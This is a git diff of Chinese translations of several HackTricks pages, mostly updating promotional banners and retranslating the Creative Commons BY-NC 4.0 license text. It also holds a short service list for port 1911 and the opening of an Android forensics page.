diff --git a/1911-pentesting-fox.md b/1911-pentesting-fox.md index 774c4403b..29c8d0e4e 100644 --- a/1911-pentesting-fox.md +++ b/1911-pentesting-fox.md @@ -1,30 +1,31 @@ -# 1911 - 渗透测试狐 +# 1911 - 渗透测试狐狸 + +{% hint style="success" %} +学习并练习 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-从零开始学习AWS黑客技术,成为 htARTE (HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边商品**](https://peass.creator-spring.com) -* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。** -* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来**分享您的黑客技巧。 +* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} -还有更多服务: +以及更多服务: -ubiquiti-discover udp "Ubiquiti Networks设备" +ubiquiti-discover udp "Ubiquiti Networks 设备" -dht udp "DHT节点" +dht udp "DHT 节点" 5060 udp sip "SIP/" ![](<.gitbook/assets/image (273).png>) -![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>) +![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>) InfluxDB @@ -38,16 +39,17 @@ InfluxDB ![](<.gitbook/assets/image (341).png>) +{% hint style="success" %} +学习并练习 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为 htARTE (HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边商品**](https://peass.creator-spring.com) -* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。** -* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来**分享您的黑客技巧。 +* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} diff --git a/6881-udp-pentesting-bittorrent.md b/6881-udp-pentesting-bittorrent.md index 1ccdece1d..3fa3fd84c 100644 --- a/6881-udp-pentesting-bittorrent.md +++ b/6881-udp-pentesting-bittorrent.md @@ -1,13 +1,14 @@ +{% hint style="success" %} +学习和实践AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习和实践GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为英雄级人物 htARTE (HackTricks AWS Red Team Expert) +支持 HackTricks -其他支持HackTricks的方式: - -* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF版本**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边商品**](https://peass.creator-spring.com) -* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。** -* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来**分享您的黑客技巧**。 +* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} diff --git a/LICENSE.md b/LICENSE.md index ef3d42b57..a515610b3 100644 --- a/LICENSE.md +++ b/LICENSE.md @@ -1,145 +1,197 @@ +{% hint style="success" %} +学习和实践AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习和实践GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为英雄级人物 htARTE (HackTricks AWS Red Team Expert) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您希望在**HackTricks上看到您的公司广告**或**下载HackTricks的PDF版本**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs收藏**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter**上**关注**我 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**。** -* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} -知识共享许可协议
版权 © Carlos Polop 2021。 除非另有说明(书中复制的外部信息属于原作者),Carlos Polop在HACK TRICKS上的文本根据知识共享署名-非商业性使用4.0国际许可协议 (CC BY-NC 4.0)授权。 +Creative Commons License
版权所有 © Carlos Polop 2021。 除非另有规定(复制到书中的外部信息属于原始作者),Carlos Polop 的 HACK TRICKS 上的文本受 知识共享署名-非商业性使用 4.0 国际许可协议 (CC BY-NC 4.0) 许可。 -许可证:署名-非商业性使用4.0国际 (CC BY-NC 4.0)
-人类可读的许可证:https://creativecommons.org/licenses/by-nc/4.0/
-完整的法律条款:https://creativecommons.org/licenses/by-nc/4.0/legalcode
-格式化:https://github.com/jmatsushita/Creative-Commons-4.0-Markdown/blob/master/licenses/by-nc.markdown
+许可证:署名-非商业性使用 4.0 国际许可协议(CC BY-NC 4.0)
+人类可读许可证:https://creativecommons.org/licenses/by-nc/4.0/
+完整法律条款:https://creativecommons.org/licenses/by-nc/4.0/legalcode
+格式:https://github.com/jmatsushita/Creative-Commons-4.0-Markdown/blob/master/licenses/by-nc.markdown
-# 知识共享 +# 创意共享 -# 署名-非商业性使用4.0国际 +# 署名-非商业性使用 4.0 国际 -知识共享公司(“知识共享”)不是律师事务所,不提供法律服务或法律建议。知识共享公共许可证的分发不创建律师-客户或其他关系。知识共享以“现状”基础提供其许可证和相关信息。知识共享不对其许可证、任何根据其条款和条件许可的材料或任何相关信息提供任何保证。知识共享对因使用其许可证而产生的损害在最大可能范围内免责。 +创意共享公司(“创意共享”)不是律师事务所,也不提供法律服务或法律建议。创意共享公共许可的分发不会创建律师-客户或其他关系。创意共享以“原样”提供其许可证和相关信息。创意共享不对其许可证、根据其条款和条件许可的任何材料或任何相关信息提供任何担保。创意共享尽可能地免除因使用而导致的所有责任。 -## 使用知识共享公共许可证 +## 使用创意共享公共许可证 -知识共享公共许可证提供了一套标准的条款和条件,创作者和其他权利持有者可以使用这些条款和条件来共享原创作品和其他受版权和某些其他权利指定的材料。以下考虑仅供参考,不是详尽无遗,也不构成我们许可证的一部分。 +创意共享公共许可证提供了一套标准的条款和条件,创作者和其他权利持有人可以使用这些条款和条件来分享原创作品和其他受版权和某些其他权利约束的材料。以下考虑仅供信息目的,不是详尽无遗的,并且不构成我们许可证的一部分。 -* __授权人的考虑:__ 我们的公共许可证旨在供有权向公众授权以其他方式受版权和某些其他权利限制的材料使用的人使用。我们的许可证是不可撤销的。授权人在应用许可证之前应阅读并理解许可证的条款和条件。授权人还应在应用我们的许可证之前确保所有必要的权利,以便公众可以按预期重用材料。授权人应明确标记任何不受许可证约束的材料。这包括其他CC许可的材料,或在版权的例外或限制下使用的材料。[授权人的更多考虑](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensors)。 +* __授权者的考虑:__ 我们的公共许可证适用于那些有权向公众授予以其他方式受版权和某些其他权利限制的材料使用许可的人。我们的许可证是不可撤销的。授权者在应用许可证之前应阅读并理解他们选择的许可证的条款和条件。授权者还应在应用我们的许可证之前获得所有必要的权利,以便公众可以按预期重用材料。授权者应清楚标记任何不受许可证约束的材料。这包括其他 CC 许可的材料,或者根据版权例外或限制使用的材料。[更多授权者的考虑](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensors)。 -* __公众的考虑:__ 通过使用我们的公共许可证之一,授权人授予公众在指定的条款和条件下使用许可材料的权限。如果出于任何原因不需要授权人的许可——例如,由于任何适用的版权例外或限制——那么该使用不受许可证的规范。我们的许可证仅授予授权人有权授予的版权和某些其他权利下的权限。出于其他原因,使用许可材料仍可能受到限制,包括因为其他人在材料中拥有版权或其他权利。授权人可能会提出特殊请求,例如要求标记或描述所有更改。尽管我们的许可证不要求,但我们鼓励您在合理的情况下尊重这些请求。[公众的更多考虑](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensees)。 +* __公众的考虑:__ 通过使用我们的公共许可证之一,授权者授予公众根据指定的条款和条件使用受许可材料的许可。如果由于任何适用的版权例外或限制而不需要授权者的许可,例如由于任何适用的版权例外或限制,那么该使用不受许可证管辖。我们的许可证仅授予授权者有权授予的版权和某些其他权利下的权限。对于其他原因,例如其他人对材料拥有版权或其他权利,对受许可材料的使用仍可能受限制。授权者可以提出特殊要求,例如要求标记或描述所有更改。虽然我们的许可证不要求这样做,但鼓励您在合理的情况下尊重这些要求。[更多公众的考虑](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensees)。 -# 知识共享署名-非商业性使用4.0国际公共许可证 +# 创意共享署名-非商业性使用 4.0 国际公共许可协议 -通过行使下文定义的许可权利,您接受并同意受本知识共享署名-非商业性使用4.0国际公共许可证(“公共许可证”)的条款和条件的约束。在本公共许可证可被解释为合同的范围内,您因接受这些条款和条件而被授予许可权利,授权人因在这些条款和条件下提供许可材料而获得的利益而授予您这些权利。 +通过行使许可权(下文定义),您接受并同意受本创意共享署名-非商业性使用 4.0 国际公共许可协议(“公共许可证”)的条款和条件约束。在某种程度上,如果本公共许可证可被解释为合同,您在接受这些条款和条件的同时被授予许可权,并且许可人出于使受许可材料根据这些条款和条件可用而获得的利益,向您授予这些权利。 -## 第1节 – 定义。 +## 第 1 节 – 定义。 -a. __改编材料__ 指受版权和类似权利约束的材料,该材料源自或基于许可材料,并且以需要许可的方式对许可材料进行了翻译、改变、安排、转换或以其他方式修改,根据授权人持有的版权和类似权利。对于本公共许可证的目的,如果许可材料是音乐作品、表演或声音录制,则当许可材料与移动图像同步时,改编材料始终被制作出来。 +a. __改编材料__ 指根据许可材料衍生或基于许可材料的受版权和类似权利的材料,在这些材料中,许可材料被翻译、改变、排列、转换或以其他方式修改,这些修改需要许可人持有的受版权和类似权利的许可。对于本公共许可证,如果许可材料是音乐作品、表演或声音录制,那么只要许可材料与移动图像同步,就会产生改编材料。 -b. __改编者许可证__ 指您根据本公共许可证的条款和条件,将您对改编材料中您的贡献所适用的版权和类似权利的许可证。 +b. __适配者的许可证__ 指您根据本公共许可证的条款和条件,对您对改编材料的贡献中的受版权和类似权利应用的许可证。 -c. __版权和类似权利__ 指与版权密切相关的版权和/或类似权利,包括但不限于表演、广播、声音录制和数据库专有权,不考虑权利的标签或分类方式。对于本公共许可证的目的,第2节(b)(1)-(2)中指定的权利不是版权和类似权利。 +c. __版权和类似权利__ 指与版权密切相关的版权和/或类似权利,包括但不限于表演、广播、声音录制和独创性数据库权利,不考虑这些权利如何被标记或分类。对于本公共许可证,第 2(b)(1)-(2) 节中指定的权利不属于版权和类似权利。 -d. __有效的技术措施__ 指在没有适当权限的情况下,根据履行1996年12月20日通过的WIPO版权条约第11条及/或类似国际协议的法律,不得规避的措施。 +d. __有效技术措施__ 指在没有适当授权的情况下,根据 1996 年 12 月 20 日通过的《世界知识产权组织版权条约》第 11 条义务履行法律下,不得规避的措施,以及类似的国际协议。 -e. __例外和限制__ 指适用于您对许可材料使用的公平使用、公平交易和/或任何其他例外或限制版权和类似权利。 +e. __例外和限制__ 指适用于您对许可材料使用的版权和类似权利的公平使用、公平交易和/或任何其他例外或限制。 -f. __许可材料__ 指授权人将本公共许可证应用于的艺术或文学作品、数据库或其他材料。 +f. __许可材料__ 指许可人应用本公共许可证的艺术作品、文学作品、数据库或其他材料。 -g. __许可权利__ 指根据本公共许可证的条款和条件授予您的权利,这些权利仅限于适用于您对许可材料使用的所有版权和类似权利,以及授权人有权许可的权利。 +g. __许可权利__ 指根据本公共许可证的条款和条件授予您的权利,这些权利仅限于适用于您对许可材料使用的所有版权和类似权利,并且许可人有权许可这些权利。 -h. __授权人__ 指在本公共许可证下授予权利的个人或实体。 +h. __许可人__ 指授予本公共许可证下的权利的个人或实体。 -i. __非商业性__ 指不主要用于或针对商业优势或金钱补偿。对于本公共许可证的目的,通过数字文件共享或类似方式将许可材料交换为受版权和类似权利约束的其他材料是非商业性的,前提是交换过程中没有支付金钱补偿。 +i. __非商业性__ 指不主要用于或针对商业优势或货币补偿。对于本公共许可证,通过数字文件共享或类似方式将许可材料交换为其他受版权和类似权利的材料是非商业性的,只要在交换过程中没有支付货币补偿。 -j. __分享__ 指通过任何需要许可权利许可的方式或过程向公众提供材料,例如复制、公开展示、公开表演、分发、传播、通信或进口,并以公众可以从他们各自选择的地点和时间访问材料的方式使材料可供公众使用。 +j. __分享__ 指通过任何需要许可权的方式或过程向公众提供材料,例如复制、公开展示、公开表演、分发、传播、传播或进口,并使材料可供公众访问,包括以公众可以在自己选择的时间和地点访问材料的方式。 -k. __数据库专有权__ 指除版权之外的权利,源自1996年3月11日欧洲议会和理事会关于数据库法律保护的指令96/9/EC,以及/或修订和/或继任,以及世界其他地方的本质上等同的权利。 +k. __独创性数据库权利__ 指除版权外的其他权利,源自欧洲议会和理事会于 1996 年 3 月 11 日通过的《数据库法律保护指令》(Directive 96/9/EC),以及在世界其他地方具有本质上等效权利。 -l. __您__ 指在本公共许可证下行使许可权利的个人或实体。您的对应含义。 +l. __您__ 指根据本公共许可证行使许可权利的个人或实体。您具有相应的含义。 +## 第2节 - 范围。 -## 第2节 – 范围。 +a. ___许可授予。___ -a. ___许可授权。___ +1. 根据本公共许可证的条款和条件,许可方特此向您授予全球范围内、免费、不可转让、非独占、不可撤销的许可,行使许可材料中的许可权,以便: -1. 根据本公共许可证的条款和条件,授权人在此授予您全球范围内的免版税、不可转授权、非独家、不可撤销的许可,以行使许可材料中的许可权利: +A. 仅限非商业目的复制和共享许可材料的全部或部分内容;以及 -A. 仅出于非商业目的复制和分享许可材料,无论是全部还是部分;以及 +B. 为仅限非商业目的生产、复制和共享改编材料。 -B. 仅出于非商业目的制作、复制和分享改编材料。 +2. __例外和限制。__ 为避免疑义,如果例外和限制适用于您的使用,本公共许可证不适用,您无需遵守其条款和条件。 -2. __例外和限制。__ 为避免疑问,如果例外和限制适用于您的使用,本公共许可证不适用,您无需遵守其条款和条件。 +3. __期限。__ 本公共许可证的期限在第6(a)节中指定。 -3. __期限。__ 本公共许可证的期限在第6节(a)中指定。 +4. __媒体和格式;允许技术修改。__ 许可方授权您在现在已知或今后创建的所有媒体和格式中行使许可权,并进行必要的技术修改。许可方放弃和/或同意不主张任何权利或权限禁止您进行必要的技术修改以行使许可权,包括规避有效技术措施所需的技术修改。根据本公共许可证的目的,仅仅进行本节2(a)(4)部分授权的修改永远不会产生改编材料。 -4. __媒体和格式;允许的技术修改。__ 授权人授权您在所有现在已知或以后创建的媒体和格式中行使许可权利,并进行必要的技术修改以便这样做。授权人放弃和/或同意不主张任何权利或权限禁止您进行必要的技术修改以行使许可权利,包括为规避有效的技术措施所需的技术修改。对于本公共许可证的目的,仅仅进行本第2节(a)(4)授权的修改从不产生改编材料。 +5. __下游接收方。__ -5. __下游接收者。__ +A. __许可方提供 - 许可材料。__ 每个许可材料的接收方自动收到许可方的提供,以便根据本公共许可证的条款和条件行使许可权。 -A. __授权人的提供 – 许可材料。__ 许可材料的每个接收者自动从授权人那里获得在本公共许可证的条款和条件下行使许可权利的提议。 +B. __无下游限制。__ 如果这样做限制了任何许可材料的接收方行使许可权,您不得提供或强加任何额外或不同的条款或条件,或应用任何有效技术措施到许可材料上。 -B. __无下游限制。__ 您不得对许可材料提供任何额外或不同的条款或条件,或对许可材料应用任何有效的技术措施,如果这样做限制了任何接收许可材料的人行使许可权利。 - -6. __无背书。__ 本公共许可证中的任何内容均不构成或可被解释为允许声称或暗示您是,或您对许可材料的使用与授权人或其他指定接收第3节(a)(1)(A)(i)规定的归属的人有关联,或得到赞助、背书或官方地位。 +6. __无认可。__ 本公共许可证中的任何内容都不构成或不得被解释为许可主张或暗示您与许可方或其他被指定接收署名的人有关联,或得到赞助、认可或官方地位的许可方或其他人。 b. ___其他权利。___ -1. 道德权利,如完整权,不在本公共许可证下许可,公众形象权、隐私权和/或其他类似人格权也不在本公共许可证下许可;然而,在可能的范围内,授权人放弃和/或同意不主张授权人持有的任何此类权利,以允许您行使许可权利的有限范围内,但不得另有规定。 +1. 道德权利,如完整性权利,不在本公共许可证下授权,宣传、隐私和/或其他类似人格权利也不在其中;然而,许可方尽可能放弃和/或同意不主张许可方持有的任何此类权利,以允许您行使许可权,但其他情况除外。 -2. 专利权和商标权不在本公共许可证下许可。 +2. 专利和商标权不在本公共许可证下授权。 -3. 在可能的范围内,授权人放弃任何从您那里收取行使许可权利的版税的权利,无论是直接的还是通过任何自愿或可放弃的法定或强制许可计划下的收费社会。在所有其他情况下,授权人明确保留收取此类版税的权利,包括当许可材料用于非非商业目的时。 +3. 尽可能,许可方放弃从您那里收取行使许可权的版税的权利,无论是直接还是通过任何自愿或可放弃的法定或强制性许可计划下的代收机构。在所有其他情况下,许可方明确保留收取此类版税的权利,包括在许可材料用于非商业目的以外的情况下。 -## 第3节 – 许可条件。 +## 第3节 - 许可条件。 -您行使许可权利明确受以下条件的约束。 +您行使许可权明确受以下条件约束。 -a. ___署名。___ +a. ___归属。___ -1. 如果您分享许可材料(包括修改后的形式),您必须: +1. 如果您共享许可材料(包括修改形式),您必须: -A. 保留授权人随许可材料提供的以下内容(如果有): +A. 保留以下由许可方提供的内容,如果有的话: -i. 以授权人要求的任何合理方式识别许可材料的创作者和任何其他指定接收署名的人(包括如果指定了化名); +i. 许可材料的创作者和任何其他被指定接收署名的人的身份,以许可方要求的任何合理方式(包括如果被指定,使用化名); ii. 版权声明; -iii. 提及本公共许可证的声明; +iii. 指向本公共许可证的通知; -iv. 提及免责声明的声明; +iv. 指向担保声明的通知; -v. 在合理可行的范围内,提供指向许可材料的URI或超链接; +v. 在合理可行的范围内,指向许可材料的URI或超链接; -B. 表明您修改了许可材料并保留任何先前修改的指示;以及 +B. 指示您是否修改了许可材料,并保留任何先前修改的指示;以及 -C. 表明许可材料在本公共许可证下许可,并包括本公共许可证的文本,或指向本公共许可证的URI或超链接。 +C. 指示许可材料是根据本公共许可证许可的,并包括本公共许可证的文本,或其URI或超链接。 -2. 您可以根据分享许可材料的媒介、方式和上下文以任何合理的方式满足第3节(a)(1)中的条件。例如,通过提供包含所需信息的资源的URI或超链接来满足条件可能是合理的。 +2. 您可以根据您共享许可材料的媒体、方式和上下文以任何合理方式满足第3(a)(1)部分的条件。例如,通过提供指向包含所需信息的资源的URI或超链接来满足条件可能是合理的。 -3. 如果授权人要求,您必须在合理可行的范围内删除第3节(a)(1)(A)要求的任何信息。 +3. 如果许可方要求,您必须在合理可行的范围内删除第3(a)(1)(A)部分要求的任何信息。 -4. 如果您分享您制作的改编材料,您应用的改编者 +4. 如果您共享您制作的改编材料,您应用的适配器许可证不得阻止改编材料的接收方遵守本公共许可证。 + +## 第4节 - 特殊数据库权利。 + +如果许可权包括适用于您对许可材料使用的特殊数据库权利: + +a. 为避免疑义,第2(a)(1)部分授予您提取、重复使用、复制和仅限非商业目的共享数据库内容全部或实质部分的权利; + +b. 如果您在具有特殊数据库权利的数据库中包含全部或实质部分的数据库内容,则您具有特殊数据库权利的数据库(但不包括其各自的内容)属于改编材料;以及 + +c. 如果您共享数据库内容的全部或实质部分,则您必须遵守第3(a)节中的条件。 + +为避免疑义,本节4补充而不取代您在许可权包括其他版权和类似权利的情况下根据本公共许可证的义务。 + +## 第5节 - 担保声明和责任限制。 + +a. __除非许可方另行承担,尽可能,许可方按原样和按现状提供许可材料,并不就许可材料的任何性质作出任何明示或默示的陈述或担保。这包括但不限于,对所有权、适销性、特定用途适用性、非侵权、潜在缺陷或其他缺陷的不存在、准确性或错误的存在或不存在等方面的担保,无论是明示的、默示的、法定的还是其他的。在不允许全面或部分免责声明的情况下,此免责声明可能不适用于您。__ + +b. __尽可能,在任何情况下,许可方不会根据任何法律理论(包括但不限于疏忽)或其他方式对您承担任何直接、特殊、间接、附带、惩罚性、示范性或其他损失、成本、费用或损害承担责任,无论许可方是否已被告知此类损失、成本、费用或损害的可能性。在不允许全面或部分责任限制的情况下,此责任限制可能不适用于您。__ + +c. 上述的担保声明和责任限制应被解释为尽可能接近绝对免责和放弃所有责任。 + +## 第6节 - 期限和终止。 + +a. 本公共许可证适用于此处许可的版权和类似权利的期限。但是,如果您未遵守本公共许可证,则您根据本公共许可证的权利将自动终止。 + +b. 如果根据第6(a)节,您使用许可材料的权利已终止,则它将重新生效: + +1. 在违规行为得到纠正的日期自动生效,前提是在您发现违规行为后30天内得到纠正;或 + +2. 由许可方明确重新生效。 + +为避免疑义,本节6(b)不影响许可方可能寻求救济您违反本公共许可证的任何权利。 + +c. 为避免疑义,许可方也可以根据单独的条款或条件提供许可材料,或随时停止分发许可材料;但是,这样做不会终止本公共许可证。 + +d. 第1、5、6、7和8节在本公共许可证终止后仍然有效。 +## 第7节 - 其他条款和条件。 + +a. 除非明确同意,许可方不受您传达的任何额外或不同的条款或条件的约束。 + +b. 有关已许可材料的任何安排、理解或协议,若未在此处声明,均与本公共许可证的条款和条件分开且独立。 + +## 第8节 - 解释。 + +a. 为避免疑义,本公共许可证不会,也不应被解释为,减少、限制、限制或对在本公共许可证下无需许可即可合法进行的任何已许可材料的使用施加条件。 + +b. 在可能范围内,如果本公共许可证的任何条款被视为不可执行,则将自动改革至使其可执行的最低程度。如果无法改革该条款,则将其从本公共许可证中剥离,而不影响其余条款和条件的可执行性。 + +c. 除非许可方明确同意,否则不会放弃本公共许可证的任何条款或条件,也不会同意违反。 + +d. 本公共许可证中的任何内容均不构成或不得被解释为对许可方或您适用的任何特权和豁免的限制或放弃,包括来自任何司法管辖区或权威的法律程序。 ``` Creative Commons is not a party to its public licenses. Notwithstanding, Creative Commons may elect to apply one of its public licenses to material it publishes and in those instances will be considered the “Licensor.” Except for the limited purpose of indicating that material is shared under a Creative Commons public license or as otherwise permitted by the Creative Commons policies published at [creativecommons.org/policies](http://creativecommons.org/policies), Creative Commons does not authorize the use of the trademark “Creative Commons” or any other trademark or logo of Creative Commons without its prior written consent including, without limitation, in connection with any unauthorized modifications to any of its public licenses or any other arrangements, understandings, or agreements concerning use of licensed material. For the avoidance of doubt, this paragraph does not form part of the public licenses. Creative Commons may be contacted at [creativecommons.org](http://creativecommons.org/). ``` +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为英雄级人物 htARTE (HackTricks AWS Red Team Expert) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF版本**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com) -* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。** -* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) 的github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} diff --git a/android-forensics.md b/android-forensics.md index b416532a7..126026fcf 100644 --- a/android-forensics.md +++ b/android-forensics.md @@ -1,51 +1,53 @@ # Android 取证 +{% hint style="success" %} +学习并练习 AWS 黑客:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习 GCP 黑客:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习 AWS 黑客技术,成为 htARTE (HackTricks AWS 红队专家) +支持 HackTricks -支持 HackTricks 的其他方式: - -* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 HackTricks 的 PDF 版本**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com) -* 发现[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs 集合**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。** -* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来**分享您的黑客技巧**。 +* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 